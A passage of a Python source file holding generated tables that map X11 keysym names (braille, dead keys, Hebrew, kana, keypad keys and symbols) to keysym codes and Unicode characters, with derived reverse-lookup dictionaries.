'braille_dots_2457': (0x100285a, u'\u285a'),
'braille_dots_24578': (0x10028da, u'\u28da'),
'braille_dots_2458': (0x100289a, u'\u289a'),
'braille_dots_246': (0x100282a, u'\u282a'),
'braille_dots_2467': (0x100286a, u'\u286a'),
'braille_dots_24678': (0x10028ea, u'\u28ea'),
'braille_dots_2468': (0x10028aa, u'\u28aa'),
'braille_dots_247': (0x100284a, u'\u284a'),
'braille_dots_2478': (0x10028ca, u'\u28ca'),
'braille_dots_248': (0x100288a, u'\u288a'),
'braille_dots_25': (0x1002812, u'\u2812'),
'braille_dots_256': (0x1002832, u'\u2832'),
'braille_dots_2567': (0x1002872, u'\u2872'),
'braille_dots_25678': (0x10028f2, u'\u28f2'),
'braille_dots_2568': (0x10028b2, u'\u28b2'),
'braille_dots_257': (0x1002852, u'\u2852'),
'braille_dots_2578': (0x10028d2, u'\u28d2'),
'braille_dots_258': (0x1002892, u'\u2892'),
'braille_dots_26': (0x1002822, u'\u2822'),
'braille_dots_267': (0x1002862, u'\u2862'),
'braille_dots_2678': (0x10028e2, u'\u28e2'),
'braille_dots_268': (0x10028a2, u'\u28a2'),
'braille_dots_27': (0x1002842, u'\u2842'),
'braille_dots_278': (0x10028c2, u'\u28c2'),
'braille_dots_28': (0x1002882, u'\u2882'),
'braille_dots_3': (0x1002804, u'\u2804'),
'braille_dots_34': (0x100280c, u'\u280c'),
'braille_dots_345': (0x100281c, u'\u281c'),
'braille_dots_3456': (0x100283c, u'\u283c'),
'braille_dots_34567': (0x100287c, u'\u287c'),
'braille_dots_345678': (0x10028fc, u'\u28fc'),
'braille_dots_34568': (0x10028bc, u'\u28bc'),
'braille_dots_3457': (0x100285c, u'\u285c'),
'braille_dots_34578': (0x10028dc, u'\u28dc'),
'braille_dots_3458': (0x100289c, u'\u289c'),
'braille_dots_346': (0x100282c, u'\u282c'),
'braille_dots_3467': (0x100286c, u'\u286c'),
'braille_dots_34678': (0x10028ec, u'\u28ec'),
'braille_dots_3468': (0x10028ac, u'\u28ac'),
'braille_dots_347': (0x100284c, u'\u284c'),
'braille_dots_3478': (0x10028cc, u'\u28cc'),
'braille_dots_348': (0x100288c, u'\u288c'),
'braille_dots_35': (0x1002814, u'\u2814'),
'braille_dots_356': (0x1002834, u'\u2834'),
'braille_dots_3567': (0x1002874, u'\u2874'),
'braille_dots_35678': (0x10028f4, u'\u28f4'),
'braille_dots_3568': (0x10028b4, u'\u28b4'),
'braille_dots_357': (0x1002854, u'\u2854'),
'braille_dots_3578': (0x10028d4, u'\u28d4'),
'braille_dots_358': (0x1002894, u'\u2894'),
'braille_dots_36': (0x1002824, u'\u2824'),
'braille_dots_367': (0x1002864, u'\u2864'),
'braille_dots_3678': (0x10028e4, u'\u28e4'),
'braille_dots_368': (0x10028a4, u'\u28a4'),
'braille_dots_37': (0x1002844, u'\u2844'),
'braille_dots_378': (0x10028c4, u'\u28c4'),
'braille_dots_38': (0x1002884, u'\u2884'),
'braille_dots_4': (0x1002808, u'\u2808'),
'braille_dots_45': (0x1002818, u'\u2818'),
'braille_dots_456': (0x1002838, u'\u2838'),
'braille_dots_4567': (0x1002878, u'\u2878'),
'braille_dots_45678': (0x10028f8, u'\u28f8'),
'braille_dots_4568': (0x10028b8, u'\u28b8'),
'braille_dots_457': (0x1002858, u'\u2858'),
'braille_dots_4578': (0x10028d8, u'\u28d8'),
'braille_dots_458': (0x1002898, u'\u2898'),
'braille_dots_46': (0x1002828, u'\u2828'),
'braille_dots_467': (0x1002868, u'\u2868'),
'braille_dots_4678': (0x10028e8, u'\u28e8'),
'braille_dots_468': (0x10028a8, u'\u28a8'),
'braille_dots_47': (0x1002848, u'\u2848'),
'braille_dots_478': (0x10028c8, u'\u28c8'),
'braille_dots_48': (0x1002888, u'\u2888'),
'braille_dots_5': (0x1002810, u'\u2810'),
'braille_dots_56': (0x1002830, u'\u2830'),
'braille_dots_567': (0x1002870, u'\u2870'),
'braille_dots_5678': (0x10028f0, u'\u28f0'),
'braille_dots_568': (0x10028b0, u'\u28b0'),
'braille_dots_57': (0x1002850, u'\u2850'),
'braille_dots_578': (0x10028d0, u'\u28d0'),
'braille_dots_58': (0x1002890, u'\u2890'),
'braille_dots_6': (0x1002820, u'\u2820'),
'braille_dots_67': (0x1002860, u'\u2860'),
'braille_dots_678': (0x10028e0, u'\u28e0'),
'braille_dots_68': (0x10028a0, u'\u28a0'),
'braille_dots_7': (0x1002840, u'\u2840'),
'braille_dots_78': (0x10028c0, u'\u28c0'),
'braille_dots_8': (0x1002880, u'\u2880'),
'breve': (0x01a2, u'\u02D8'),
'brokenbar': (0x00a6, u'\u00A6'),
'c': (0x0063, u'\u0063'),
'cabovedot': (0x02e5, u'\u010B'),
'cacute': (0x01e6, u'\u0107'),
'careof': (0x0ab8, u'\u2105'),
'caret': (0x0afc, u'\u2038'),
'caron': (0x01b7, u'\u02C7'),
'ccaron': (0x01e8, u'\u010D'),
'ccedilla': (0x00e7, u'\u00E7'),
'ccircumflex': (0x02e6, u'\u0109'),
'cedilla': (0x00b8, u'\u00B8'),
'cent': (0x00a2, u'\u00A2'),
'checkerboard': (0x09e1, u'\u2592'),
'checkmark': (0x0af3, u'\u2713'),
'circle': (0x0bcf, u'\u25CB'),
'club': (0x0aec, u'\u2663'),
'colon': (0x003a, u'\u003A'),
'comma': (0x002c, u'\u002C'),
'containsas': (0x100220B, u'\u220B'),
'copyright': (0x00a9, u'\u00A9'),
'cr': (0x09e4, u'\u240D'),
'crossinglines': (0x09ee, u'\u253C'),
'cuberoot': (0x100221B, u'\u221B'),
'currency': (0x00a4, u'\u00A4'),
'd': (0x0064, u'\u0064'),
'dabovedot': (0x1001e0b, u'\u1E0B'),
'dagger': (0x0af1, u'\u2020'),
'dcaron': (0x01ef, u'\u010F'),
'dead_A': (0xfe81, None),
'dead_E': (0xfe83, None),
'dead_I': (0xfe85, None),
'dead_O': (0xfe87, None),
'dead_U': (0xfe89, None),
'dead_a': (0xfe80, None),
'dead_abovecomma': (0xfe64, u'\u0315'),
'dead_abovedot': (0xfe56, u'\u0307'),
'dead_abovereversedcomma': (0xfe65, u'\u0312'),
'dead_abovering': (0xfe58, u'\u030A'),
'dead_aboveverticalline': (0xfe91, u'\u030D'),
'dead_acute': (0xfe51, u'\u0301'),
'dead_belowbreve': (0xfe6b, u'\u032E'),
'dead_belowcircumflex': (0xfe69, u'\u032D'),
'dead_belowcomma': (0xfe6e, u'\u0326'),
'dead_belowdiaeresis': (0xfe6c, u'\u0324'),
'dead_belowdot': (0xfe60, u'\u0323'),
'dead_belowmacron': (0xfe68, u'\u0331'),
'dead_belowring': (0xfe67, u'\u0325'),
'dead_belowtilde': (0xfe6a, u'\u0330'),
'dead_belowverticalline': (0xfe92, u'\u0329'),
'dead_breve': (0xfe55, u'\u0306'),
'dead_capital_schwa': (0xfe8b, None),
'dead_caron': (0xfe5a, u'\u030C'),
'dead_cedilla': (0xfe5b, u'\u0327'),
'dead_circumflex': (0xfe52, u'\u0302'),
'dead_currency': (0xfe6f, None),
'dead_diaeresis': (0xfe57, u'\u0308'),
'dead_doubleacute': (0xfe59, u'\u030B'),
'dead_doublegrave': (0xfe66, u'\u030F'),
'dead_e': (0xfe82, None),
'dead_grave': (0xfe50, u'\u0300'),
'dead_greek': (0xfe8c, None),
'dead_hook': (0xfe61, u'\u0309'),
'dead_horn': (0xfe62, u'\u031B'),
'dead_i': (0xfe84, None),
'dead_invertedbreve': (0xfe6d, u'\u032F'),
'dead_iota': (0xfe5d, u'\u0345'),
'dead_longsolidusoverlay': (0xfe93, u'\u0338'),
'dead_lowline': (0xfe90, u'\u0332'),
'dead_macron': (0xfe54, u'\u0304'),
'dead_o': (0xfe86, None),
'dead_ogonek': (0xfe5c, u'\u0328'),
'dead_semivoiced_sound': (0xfe5f, None),
'dead_small_schwa': (0xfe8a, None),
'dead_stroke': (0xfe63, u'\u0335'),
'dead_tilde': (0xfe53, u'\u0303'),
'dead_u': (0xfe88, None),
'dead_voiced_sound': (0xfe5e, None),
'degree': (0x00b0, u'\u00B0'),
'diaeresis': (0x00a8, u'\u00A8'),
'diamond': (0x0aed, u'\u2666'),
'digitspace': (0x0aa5, u'\u2007'),
'dintegral': (0x100222C, u'\u222C'),
'division': (0x00f7, u'\u00F7'),
'dollar': (0x0024, u'\u0024'),
'doubbaselinedot': (0x0aaf, u'\u2025'),
'doubleacute': (0x01bd, u'\u02DD'),
'doubledagger': (0x0af2, u'\u2021'),
'doublelowquotemark': (0x0afe, u'\u201E'),
'downarrow': (0x08fe, u'\u2193'),
'downstile': (0x0bc4, u'\u230A'),
'downtack': (0x0bc2, u'\u22A4'),
'dstroke': (0x01f0, u'\u0111'),
'e': (0x0065, u'\u0065'),
'eabovedot': (0x03ec, u'\u0117'),
'eacute': (0x00e9, u'\u00E9'),
'ebelowdot': (0x1001eb9, u'\u1EB9'),
'ecaron': (0x01ec, u'\u011B'),
'ecircumflex': (0x00ea, u'\u00EA'),
'ecircumflexacute': (0x1001ebf, u'\u1EBF'),
'ecircumflexbelowdot': (0x1001ec7, u'\u1EC7'),
'ecircumflexgrave': (0x1001ec1, u'\u1EC1'),
'ecircumflexhook': (0x1001ec3, u'\u1EC3'),
'ecircumflextilde': (0x1001ec5, u'\u1EC5'),
'ediaeresis': (0x00eb, u'\u00EB'),
'egrave': (0x00e8, u'\u00E8'),
'ehook': (0x1001ebb, u'\u1EBB'),
'eightsubscript': (0x1002088, u'\u2088'),
'eightsuperior': (0x1002078, u'\u2078'),
'elementof': (0x1002208, u'\u2208'),
'ellipsis': (0x0aae, u'\u2026'),
'em3space': (0x0aa3, u'\u2004'),
'em4space': (0x0aa4, u'\u2005'),
'emacron': (0x03ba, u'\u0113'),
'emdash': (0x0aa9, u'\u2014'),
'emptyset': (0x1002205, u'\u2205'),
'emspace': (0x0aa1, u'\u2003'),
'endash': (0x0aaa, u'\u2013'),
'eng': (0x03bf, u'\u014B'),
'enspace': (0x0aa2, u'\u2002'),
'eogonek': (0x01ea, u'\u0119'),
'equal': (0x003d, u'\u003D'),
'eth': (0x00f0, u'\u00F0'),
'etilde': (0x1001ebd, u'\u1EBD'),
'exclam': (0x0021, u'\u0021'),
'exclamdown': (0x00a1, u'\u00A1'),
'ezh': (0x1000292, u'\u0292'),
'f': (0x0066, u'\u0066'),
'fabovedot': (0x1001e1f, u'\u1E1F'),
'femalesymbol': (0x0af8, u'\u2640'),
'ff': (0x09e3, u'\u240C'),
'figdash': (0x0abb, u'\u2012'),
'fiveeighths': (0x0ac5, u'\u215D'),
'fivesixths': (0x0ab7, u'\u215A'),
'fivesubscript': (0x1002085, u'\u2085'),
'fivesuperior': (0x1002075, u'\u2075'),
'fourfifths': (0x0ab5, u'\u2158'),
'foursubscript': (0x1002084, u'\u2084'),
'foursuperior': (0x1002074, u'\u2074'),
'fourthroot': (0x100221C, u'\u221C'),
'function': (0x08f6, u'\u0192'),
'g': (0x0067, u'\u0067'),
'gabovedot': (0x02f5, u'\u0121'),
'gbreve': (0x02bb, u'\u011F'),
'gcaron': (0x10001e7, u'\u01E7'),
'gcedilla': (0x03bb, u'\u0123'),
'gcircumflex': (0x02f8, u'\u011D'),
'grave': (0x0060, u'\u0060'),
'greater': (0x003e, u'\u003E'),
'greaterthanequal': (0x08be, u'\u2265'),
'guillemotleft': (0x00ab, u'\u00AB'),
'guillemotright': (0x00bb, u'\u00BB'),
'h': (0x0068, u'\u0068'),
'hairspace': (0x0aa8, u'\u200A'),
'hcircumflex': (0x02b6, u'\u0125'),
'heart': (0x0aee, u'\u2665'),
'hebrew_aleph': (0x0ce0, u'\u05D0'),
'hebrew_ayin': (0x0cf2, u'\u05E2'),
'hebrew_bet': (0x0ce1, u'\u05D1'),
'hebrew_chet': (0x0ce7, u'\u05D7'),
'hebrew_dalet': (0x0ce3, u'\u05D3'),
'hebrew_doublelowline': (0x0cdf, u'\u2017'),
'hebrew_finalkaph': (0x0cea, u'\u05DA'),
'hebrew_finalmem': (0x0ced, u'\u05DD'),
'hebrew_finalnun': (0x0cef, u'\u05DF'),
'hebrew_finalpe': (0x0cf3, u'\u05E3'),
'hebrew_finalzade': (0x0cf5, u'\u05E5'),
'hebrew_gimel': (0x0ce2, u'\u05D2'),
'hebrew_he': (0x0ce4, u'\u05D4'),
'hebrew_kaph': (0x0ceb, u'\u05DB'),
'hebrew_lamed': (0x0cec, u'\u05DC'),
'hebrew_mem': (0x0cee, u'\u05DE'),
'hebrew_nun': (0x0cf0, u'\u05E0'),
'hebrew_pe': (0x0cf4, u'\u05E4'),
'hebrew_qoph': (0x0cf7, u'\u05E7'),
'hebrew_resh': (0x0cf8, u'\u05E8'),
'hebrew_samech': (0x0cf1, u'\u05E1'),
'hebrew_shin': (0x0cf9, u'\u05E9'),
'hebrew_taw': (0x0cfa, u'\u05EA'),
'hebrew_tet': (0x0ce8, u'\u05D8'),
'hebrew_waw': (0x0ce5, u'\u05D5'),
'hebrew_yod': (0x0ce9, u'\u05D9'),
'hebrew_zade': (0x0cf6, u'\u05E6'),
'hebrew_zain': (0x0ce6, u'\u05D6'),
'horizlinescan1': (0x09ef, u'\u23BA'),
'horizlinescan3': (0x09f0, u'\u23BB'),
'horizlinescan5': (0x09f1, u'\u2500'),
'horizlinescan7': (0x09f2, u'\u23BC'),
'horizlinescan9': (0x09f3, u'\u23BD'),
'hstroke': (0x02b1, u'\u0127'),
'ht': (0x09e2, u'\u2409'),
'hyphen': (0x00ad, u'\u00AD'),
'i': (0x0069, u'\u0069'),
'iacute': (0x00ed, u'\u00ED'),
'ibelowdot': (0x1001ecb, u'\u1ECB'),
'ibreve': (0x100012d, u'\u012D'),
'icircumflex': (0x00ee, u'\u00EE'),
'identical': (0x08cf, u'\u2261'),
'idiaeresis': (0x00ef, u'\u00EF'),
'idotless': (0x02b9, u'\u0131'),
'ifonlyif': (0x08cd, u'\u21D4'),
'igrave': (0x00ec, u'\u00EC'),
'ihook': (0x1001ec9, u'\u1EC9'),
'imacron': (0x03ef, u'\u012B'),
'implies': (0x08ce, u'\u21D2'),
'includedin': (0x08da, u'\u2282'),
'includes': (0x08db, u'\u2283'),
'infinity': (0x08c2, u'\u221E'),
'integral': (0x08bf, u'\u222B'),
'intersection': (0x08dc, u'\u2229'),
'iogonek': (0x03e7, u'\u012F'),
'itilde': (0x03b5, u'\u0129'),
'j': (0x006a, u'\u006A'),
'jcircumflex': (0x02bc, u'\u0135'),
'jot': (0x0bca, u'\u2218'),
'k': (0x006b, u'\u006B'),
'kana_A': (0x04b1, u'\u30A2'),
'kana_CHI': (0x04c1, u'\u30C1'),
'kana_E': (0x04b4, u'\u30A8'),
'kana_FU': (0x04cc, u'\u30D5'),
'kana_HA': (0x04ca, u'\u30CF'),
'kana_HE': (0x04cd, u'\u30D8'),
'kana_HI': (0x04cb, u'\u30D2'),
'kana_HO': (0x04ce, u'\u30DB'),
'kana_I': (0x04b2, u'\u30A4'),
'kana_KA': (0x04b6, u'\u30AB'),
'kana_KE': (0x04b9, u'\u30B1'),
'kana_KI': (0x04b7, u'\u30AD'),
'kana_KO': (0x04ba, u'\u30B3'),
'kana_KU': (0x04b8, u'\u30AF'),
'kana_MA': (0x04cf, u'\u30DE'),
'kana_ME': (0x04d2, u'\u30E1'),
'kana_MI': (0x04d0, u'\u30DF'),
'kana_MO': (0x04d3, u'\u30E2'),
'kana_MU': (0x04d1, u'\u30E0'),
'kana_N': (0x04dd, u'\u30F3'),
'kana_NA': (0x04c5, u'\u30CA'),
'kana_NE': (0x04c8, u'\u30CD'),
'kana_NI': (0x04c6, u'\u30CB'),
'kana_NO': (0x04c9, u'\u30CE'),
'kana_NU': (0x04c7, u'\u30CC'),
'kana_O': (0x04b5, u'\u30AA'),
'kana_RA': (0x04d7, u'\u30E9'),
'kana_RE': (0x04da, u'\u30EC'),
'kana_RI': (0x04d8, u'\u30EA'),
'kana_RO': (0x04db, u'\u30ED'),
'kana_RU': (0x04d9, u'\u30EB'),
'kana_SA': (0x04bb, u'\u30B5'),
'kana_SE': (0x04be, u'\u30BB'),
'kana_SHI': (0x04bc, u'\u30B7'),
'kana_SO': (0x04bf, u'\u30BD'),
'kana_SU': (0x04bd, u'\u30B9'),
'kana_TA': (0x04c0, u'\u30BF'),
'kana_TE': (0x04c3, u'\u30C6'),
'kana_TO': (0x04c4, u'\u30C8'),
'kana_TSU': (0x04c2, u'\u30C4'),
'kana_U': (0x04b3, u'\u30A6'),
'kana_WA': (0x04dc, u'\u30EF'),
'kana_WO': (0x04a6, u'\u30F2'),
'kana_YA': (0x04d4, u'\u30E4'),
'kana_YO': (0x04d6, u'\u30E8'),
'kana_YU': (0x04d5, u'\u30E6'),
'kana_a': (0x04a7, u'\u30A1'),
'kana_closingbracket': (0x04a3, u'\u300D'),
'kana_comma': (0x04a4, u'\u3001'),
'kana_conjunctive': (0x04a5, u'\u30FB'),
'kana_e': (0x04aa, u'\u30A7'),
'kana_fullstop': (0x04a1, u'\u3002'),
'kana_i': (0x04a8, u'\u30A3'),
'kana_o': (0x04ab, u'\u30A9'),
'kana_openingbracket': (0x04a2, u'\u300C'),
'kana_tsu': (0x04af, u'\u30C3'),
'kana_u': (0x04a9, u'\u30A5'),
'kana_ya': (0x04ac, u'\u30E3'),
'kana_yo': (0x04ae, u'\u30E7'),
'kana_yu': (0x04ad, u'\u30E5'),
'kcedilla': (0x03f3, u'\u0137'),
'kra': (0x03a2, u'\u0138'),
'l': (0x006c, u'\u006C'),
'lacute': (0x01e5, u'\u013A'),
'latincross': (0x0ad9, u'\u271D'),
'lbelowdot': (0x1001e37, u'\u1E37'),
'lcaron': (0x01b5, u'\u013E'),
'lcedilla': (0x03b6, u'\u013C'),
'leftarrow': (0x08fb, u'\u2190'),
'leftdoublequotemark': (0x0ad2, u'\u201C'),
'leftmiddlecurlybrace': (0x08af, u'\u23A8'),
'leftradical': (0x08a1, u'\u23B7'),
'leftsinglequotemark': (0x0ad0, u'\u2018'),
'leftt': (0x09f4, u'\u251C'),
'lefttack': (0x0bdc, u'\u22A3'),
'less': (0x003c, u'\u003C'),
'lessthanequal': (0x08bc, u'\u2264'),
'lf': (0x09e5, u'\u240A'),
'logicaland': (0x08de, u'\u2227'),
'logicalor': (0x08df, u'\u2228'),
'lowleftcorner': (0x09ed, u'\u2514'),
'lowrightcorner': (0x09ea, u'\u2518'),
'lstroke': (0x01b3, u'\u0142'),
'm': (0x006d, u'\u006D'),
'mabovedot': (0x1001e41, u'\u1E41'),
'macron': (0x00af, u'\u00AF'),
'malesymbol': (0x0af7, u'\u2642'),
'maltesecross': (0x0af0, u'\u2720'),
'masculine': (0x00ba, u'\u00BA'),
'minus': (0x002d, u'\u002D'),
'minutes': (0x0ad6, u'\u2032'),
'mu': (0x00b5, u'\u00B5'),
'multiply': (0x00d7, u'\u00D7'),
'musicalflat': (0x0af6, u'\u266D'),
'musicalsharp': (0x0af5, u'\u266F'),
'n': (0x006e, u'\u006E'),
'nabla': (0x08c5, u'\u2207'),
'nacute': (0x01f1, u'\u0144'),
'ncaron': (0x01f2, u'\u0148'),
'ncedilla': (0x03f1, u'\u0146'),
'ninesubscript': (0x1002089, u'\u2089'),
'ninesuperior': (0x1002079, u'\u2079'),
'nl': (0x09e8, u'\u2424'),
'nobreakspace': (0x00a0, u'\u00A0'),
'notapproxeq': (0x1002247, u'\u2247'),
'notelementof': (0x1002209, u'\u2209'),
'notequal': (0x08bd, u'\u2260'),
'notidentical': (0x1002262, u'\u2262'),
'notsign': (0x00ac, u'\u00AC'),
'ntilde': (0x00f1, u'\u00F1'),
'numbersign': (0x0023, u'\u0023'),
'numerosign': (0x06b0, u'\u2116'),
'o': (0x006f, u'\u006F'),
'oacute': (0x00f3, u'\u00F3'),
'obarred': (0x1000275, u'\u0275'),
'obelowdot': (0x1001ecd, u'\u1ECD'),
'ocaron': (0x10001d2, u'\u01D2'),
'ocircumflex': (0x00f4, u'\u00F4'),
'ocircumflexacute': (0x1001ed1, u'\u1ED1'),
'ocircumflexbelowdot': (0x1001ed9, u'\u1ED9'),
'ocircumflexgrave': (0x1001ed3, u'\u1ED3'),
'ocircumflexhook': (0x1001ed5, u'\u1ED5'),
'ocircumflextilde': (0x1001ed7, u'\u1ED7'),
'odiaeresis': (0x00f6, u'\u00F6'),
'odoubleacute': (0x01f5, u'\u0151'),
'oe': (0x13bd, u'\u0153'),
'ogonek': (0x01b2, u'\u02DB'),
'ograve': (0x00f2, u'\u00F2'),
'ohook': (0x1001ecf, u'\u1ECF'),
'ohorn': (0x10001a1, u'\u01A1'),
'ohornacute': (0x1001edb, u'\u1EDB'),
'ohornbelowdot': (0x1001ee3, u'\u1EE3'),
'ohorngrave': (0x1001edd, u'\u1EDD'),
'ohornhook': (0x1001edf, u'\u1EDF'),
'ohorntilde': (0x1001ee1, u'\u1EE1'),
'omacron': (0x03f2, u'\u014D'),
'oneeighth': (0x0ac3, u'\u215B'),
'onefifth': (0x0ab2, u'\u2155'),
'onehalf': (0x00bd, u'\u00BD'),
'onequarter': (0x00bc, u'\u00BC'),
'onesixth': (0x0ab6, u'\u2159'),
'onesubscript': (0x1002081, u'\u2081'),
'onesuperior': (0x00b9, u'\u00B9'),
'onethird': (0x0ab0, u'\u2153'),
'ooblique': (0x00f8, u'\u00F8'),
'ordfeminine': (0x00aa, u'\u00AA'),
'oslash': (0x00f8, u'\u00F8'),
'otilde': (0x00f5, u'\u00F5'),
'overline': (0x047e, u'\u203E'),
'p': (0x0070, u'\u0070'),
'pabovedot': (0x1001e57, u'\u1E57'),
'paragraph': (0x00b6, u'\u00B6'),
'parenleft': (0x0028, u'\u0028'),
'parenright': (0x0029, u'\u0029'),
'partdifferential': (0x1002202, u'\u2202'),
'partialderivative': (0x08ef, u'\u2202'),
'percent': (0x0025, u'\u0025'),
'period': (0x002e, u'\u002E'),
'periodcentered': (0x00b7, u'\u00B7'),
'permille': (0x0ad5, u'\u2030'),
'phonographcopyright': (0x0afb, u'\u2117'),
'plus': (0x002b, u'\u002B'),
'plusminus': (0x00b1, u'\u00B1'),
'prescription': (0x0ad4, u'\u211E'),
'prolongedsound': (0x04b0, u'\u30FC'),
'punctspace': (0x0aa6, u'\u2008'),
'q': (0x0071, u'\u0071'),
'quad': (0x0bcc, u'\u2395'),
'question': (0x003f, u'\u003F'),
'questiondown': (0x00bf, u'\u00BF'),
'quotedbl': (0x0022, u'\u0022'),
'r': (0x0072, u'\u0072'),
'racute': (0x01e0, u'\u0155'),
'radical': (0x08d6, u'\u221A'),
'rcaron': (0x01f8, u'\u0159'),
'rcedilla': (0x03b3, u'\u0157'),
'registered': (0x00ae, u'\u00AE'),
'rightarrow': (0x08fd, u'\u2192'),
'rightdoublequotemark': (0x0ad3, u'\u201D'),
'rightmiddlecurlybrace': (0x08b0, u'\u23AC'),
'rightsinglequotemark': (0x0ad1, u'\u2019'),
'rightt': (0x09f5, u'\u2524'),
'righttack': (0x0bfc, u'\u22A2'),
's': (0x0073, u'\u0073'),
'sabovedot': (0x1001e61, u'\u1E61'),
'sacute': (0x01b6, u'\u015B'),
'scaron': (0x01b9, u'\u0161'),
'scedilla': (0x01ba, u'\u015F'),
'schwa': (0x1000259, u'\u0259'),
'scircumflex': (0x02fe, u'\u015D'),
'seconds': (0x0ad7, u'\u2033'),
'section': (0x00a7, u'\u00A7'),
'semicolon': (0x003b, u'\u003B'),
'semivoicedsound': (0x04df, u'\u309C'),
'seveneighths': (0x0ac6, u'\u215E'),
'sevensubscript': (0x1002087, u'\u2087'),
'sevensuperior': (0x1002077, u'\u2077'),
'similarequal': (0x08c9, u'\u2243'),
'singlelowquotemark': (0x0afd, u'\u201A'),
'sixsubscript': (0x1002086, u'\u2086'),
'sixsuperior': (0x1002076, u'\u2076'),
'slash': (0x002f, u'\u002F'),
'soliddiamond': (0x09e0, u'\u25C6'),
'space': (0x0020, u'\u0020'),
'squareroot': (0x100221A, u'\u221A'),
'ssharp': (0x00df, u'\u00DF'),
'sterling': (0x00a3, u'\u00A3'),
'stricteq': (0x1002263, u'\u2263'),
't': (0x0074, u'\u0074'),
'tabovedot': (0x1001e6b, u'\u1E6B'),
'tcaron': (0x01bb, u'\u0165'),
'tcedilla': (0x01fe, u'\u0163'),
'telephone': (0x0af9, u'\u260E'),
'telephonerecorder': (0x0afa, u'\u2315'),
'therefore': (0x08c0, u'\u2234'),
'thinspace': (0x0aa7, u'\u2009'),
'thorn': (0x00fe, u'\u00FE'),
'threeeighths': (0x0ac4, u'\u215C'),
'threefifths': (0x0ab4, u'\u2157'),
'threequarters': (0x00be, u'\u00BE'),
'threesubscript': (0x1002083, u'\u2083'),
'threesuperior': (0x00b3, u'\u00B3'),
'tintegral': (0x100222D, u'\u222D'),
'topintegral': (0x08a4, u'\u2320'),
'topleftparens': (0x08ab, u'\u239B'),
'topleftsqbracket': (0x08a7, u'\u23A1'),
'toprightparens': (0x08ad, u'\u239E'),
'toprightsqbracket': (0x08a9, u'\u23A4'),
'topt': (0x09f7, u'\u252C'),
'trademark': (0x0ac9, u'\u2122'),
'tslash': (0x03bc, u'\u0167'),
'twofifths': (0x0ab3, u'\u2156'),
'twosubscript': (0x1002082, u'\u2082'),
'twosuperior': (0x00b2, u'\u00B2'),
'twothirds': (0x0ab1, u'\u2154'),
'u': (0x0075, u'\u0075'),
'uacute': (0x00fa, u'\u00FA'),
'ubelowdot': (0x1001ee5, u'\u1EE5'),
'ubreve': (0x02fd, u'\u016D'),
'ucircumflex': (0x00fb, u'\u00FB'),
'udiaeresis': (0x00fc, u'\u00FC'),
'udoubleacute': (0x01fb, u'\u0171'),
'ugrave': (0x00f9, u'\u00F9'),
'uhook': (0x1001ee7, u'\u1EE7'),
'uhorn': (0x10001b0, u'\u01B0'),
'uhornacute': (0x1001ee9, u'\u1EE9'),
'uhornbelowdot': (0x1001ef1, u'\u1EF1'),
'uhorngrave': (0x1001eeb, u'\u1EEB'),
'uhornhook': (0x1001eed, u'\u1EED'),
'uhorntilde': (0x1001eef, u'\u1EEF'),
'umacron': (0x03fe, u'\u016B'),
'underscore': (0x005f, u'\u005F'),
'union': (0x08dd, u'\u222A'),
'uogonek': (0x03f9, u'\u0173'),
'uparrow': (0x08fc, u'\u2191'),
'upleftcorner': (0x09ec, u'\u250C'),
'uprightcorner': (0x09eb, u'\u2510'),
'upstile': (0x0bd3, u'\u2308'),
'uptack': (0x0bce, u'\u22A5'),
'uring': (0x01f9, u'\u016F'),
'utilde': (0x03fd, u'\u0169'),
'v': (0x0076, u'\u0076'),
'variation': (0x08c1, u'\u221D'),
'vertbar': (0x09f8, u'\u2502'),
'voicedsound': (0x04de, u'\u309B'),
'vt': (0x09e9, u'\u240B'),
'w': (0x0077, u'\u0077'),
'wacute': (0x1001e83, u'\u1E83'),
'wcircumflex': (0x1000175, u'\u0175'),
'wdiaeresis': (0x1001e85, u'\u1E85'),
'wgrave': (0x1001e81, u'\u1E81'),
'x': (0x0078, u'\u0078'),
'xabovedot': (0x1001e8b, u'\u1E8B'),
'y': (0x0079, u'\u0079'),
'yacute': (0x00fd, u'\u00FD'),
'ybelowdot': (0x1001ef5, u'\u1EF5'),
'ycircumflex': (0x1000177, u'\u0177'),
'ydiaeresis': (0x00ff, u'\u00FF'),
'yen': (0x00a5, u'\u00A5'),
'ygrave': (0x1001ef3, u'\u1EF3'),
'yhook': (0x1001ef7, u'\u1EF7'),
'ytilde': (0x1001ef9, u'\u1EF9'),
'z': (0x007a, u'\u007A'),
'zabovedot': (0x01bf, u'\u017C'),
'zacute': (0x01bc, u'\u017A'),
'zcaron': (0x01be, u'\u017E'),
'zerosubscript': (0x1002080, u'\u2080'),
'zerosuperior': (0x1002070, u'\u2070'),
'zstroke': (0x10001b6, u'\u01B6')}
DEAD_KEYS = {
u'\u0307': u'\u02D9',
u'\u030A': u'\u02DA',
u'\u0301': u'\u00B4',
u'\u0306': u'\u02D8',
u'\u030C': u'\u02C7',
u'\u0327': u'\u00B8',
u'\u0302': u'\u005E',
u'\u0308': u'\u00A8',
u'\u030B': u'\u02DD',
u'\u0300': u'\u0060',
u'\u0345': u'\u037A',
u'\u0332': u'\u005F',
u'\u0304': u'\u00AF',
u'\u0328': u'\u02DB',
u'\u0303': u'\u007E'}
KEYPAD_KEYS = {
'KP_0': 0xffb0,
'KP_1': 0xffb1,
'KP_2': 0xffb2,
'KP_3': 0xffb3,
'KP_4': 0xffb4,
'KP_5': 0xffb5,
'KP_6': 0xffb6,
'KP_7': 0xffb7,
'KP_8': 0xffb8,
'KP_9': 0xffb9,
'KP_Add': 0xffab,
'KP_Begin': 0xff9d,
'KP_Decimal': 0xffae,
'KP_Delete': 0xff9f,
'KP_Divide': 0xffaf,
'KP_Down': 0xff99,
'KP_End': 0xff9c,
'KP_Enter': 0xff8d,
'KP_Equal': 0xffbd,
'KP_F1': 0xff91,
'KP_F2': 0xff92,
'KP_F3': 0xff93,
'KP_F4': 0xff94,
'KP_Home': 0xff95,
'KP_Insert': 0xff9e,
'KP_Left': 0xff96,
'KP_Multiply': 0xffaa,
'KP_Next': 0xff9b,
'KP_Page_Down': 0xff9b,
'KP_Page_Up': 0xff9a,
'KP_Prior': 0xff9a,
'KP_Right': 0xff98,
'KP_Separator': 0xffac,
'KP_Space': 0xff80,
'KP_Subtract': 0xffad,
'KP_Tab': 0xff89,
'KP_Up': 0xff97}
CHARS = {
codepoint: name
for name, (keysym, codepoint) in SYMBOLS.items()
if codepoint}
KEYSYMS = {
keysym: name
for name, (keysym, codepoint) in SYMBOLS.items()
if codepoint}
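# Illustrative sketch (not part of the generated tables above): SYMBOLS maps a
# keysym name to (keysym, character), and the derived CHARS/KEYSYMS tables
# invert that mapping, so a character can be resolved back to its symbolic
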